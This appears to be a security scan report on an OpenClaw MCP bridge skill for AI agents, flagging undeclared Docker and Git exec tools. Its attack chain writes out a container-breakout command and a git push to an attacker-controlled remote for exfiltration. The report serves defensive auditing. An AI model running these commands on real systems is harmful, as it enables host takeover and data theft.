扫描报告
68 /100
zanna-aperta
MCP Bridge completo per OpenClaw con 45 tool per agenti, workspace, progetti, cron, browser, canvas, nodes, messaging, gateway, Ollama e ClawX
Skill contains undeclared exec_docker and exec_git tools allowing arbitrary shell command execution, plus suspicious 'ragretrevers' directory naming pattern indicative of covert operations.
不要安装此技能
Do not deploy. Remove undeclared exec tools or properly document them with restricted command allowlists. Investigate the 'ragretrevers' directory name origin.
攻击链 5 步
◎
入口 Skill masquerades as MCP bridge for OpenClaw with 45 declared tools
SKILL.md:1⬡
提权 Attacker discovers undeclared exec_docker/exec_git tools via tools/list
zanna-aperta.py:467⬡
提权 Attacker executes arbitrary Docker commands (docker run --rm -v /:/host alpine chroot /host sh)
zanna-aperta.py:467⬡
提权 Attacker uses exec_git to push sensitive data to external repo (git push --all attacker-controlled remote)
zanna-aperta.py:479◉
影响 Full container breakout and data exfiltration via git remote
zanna-aperta.py:479安全发现 6 项
| 严重性 | 安全发现 | 位置 |
|---|---|---|
| 高危 | Undeclared arbitrary Docker command execution 代码执行 | zanna-aperta.py:467 |
| 高危 | Undeclared arbitrary Git command execution 代码执行 | zanna-aperta.py:479 |
| 中危 | SKILL.md missing exec tools declaration 文档欺骗 | SKILL.md:1 |
| 中危 | Suspicious directory naming pattern 敏感访问 | zanna-aperta.py:19 |
| 中危 | Undeclared subprocess usage throughout 权限提升 | zanna-aperta.py:64 |
| 低危 | Unpinned external tool dependencies 供应链 | zanna-aperta.py:467 |
| 资源类型 | 声明权限 | 推断权限 | 状态 | 证据 |
|---|---|---|---|---|
| 文件系统 | WRITE | WRITE | ✓ 一致 | workspace_create, project_create write to disk |
| 命令执行 | NONE | WRITE | ✗ 越权 | exec_docker (line 467), exec_git (line 479) accept arbitrary commands |
| 网络访问 | READ | READ | ✓ 一致 | Ollama API calls to localhost:11434 |
| 技能调用 | NONE | WRITE | ✗ 越权 | sessions_send, cron_add allow arbitrary message injection |
目录结构
2 文件 · 57.2 KB · 1499 行 Python 1f · 1435L
Markdown 1f · 64L
├─
SKILL.md
Markdown
└─
zanna-aperta.py
Python
依赖分析 4 项
| 包名 | 版本 | 来源 | 已知漏洞 | 备注 |
|---|---|---|---|---|
docker | * | system | 否 | Binary not pinned, accessed via subprocess |
git | * | system | 否 | Binary not pinned, accessed via subprocess |
pnpm | * | system | 否 | Used for ClawX startup via pnpm run dev |
ollama | * | system | 否 | Optional local AI, called via curl |
安全亮点
✓ Skill follows standard MCP protocol structure
✓ Input validation via inputSchema in tool definitions
✓ Timeout limits on subprocess calls (30-300s)
✓ JSON-RPC error handling present
✓ No base64-encoded payloads or obfuscation detected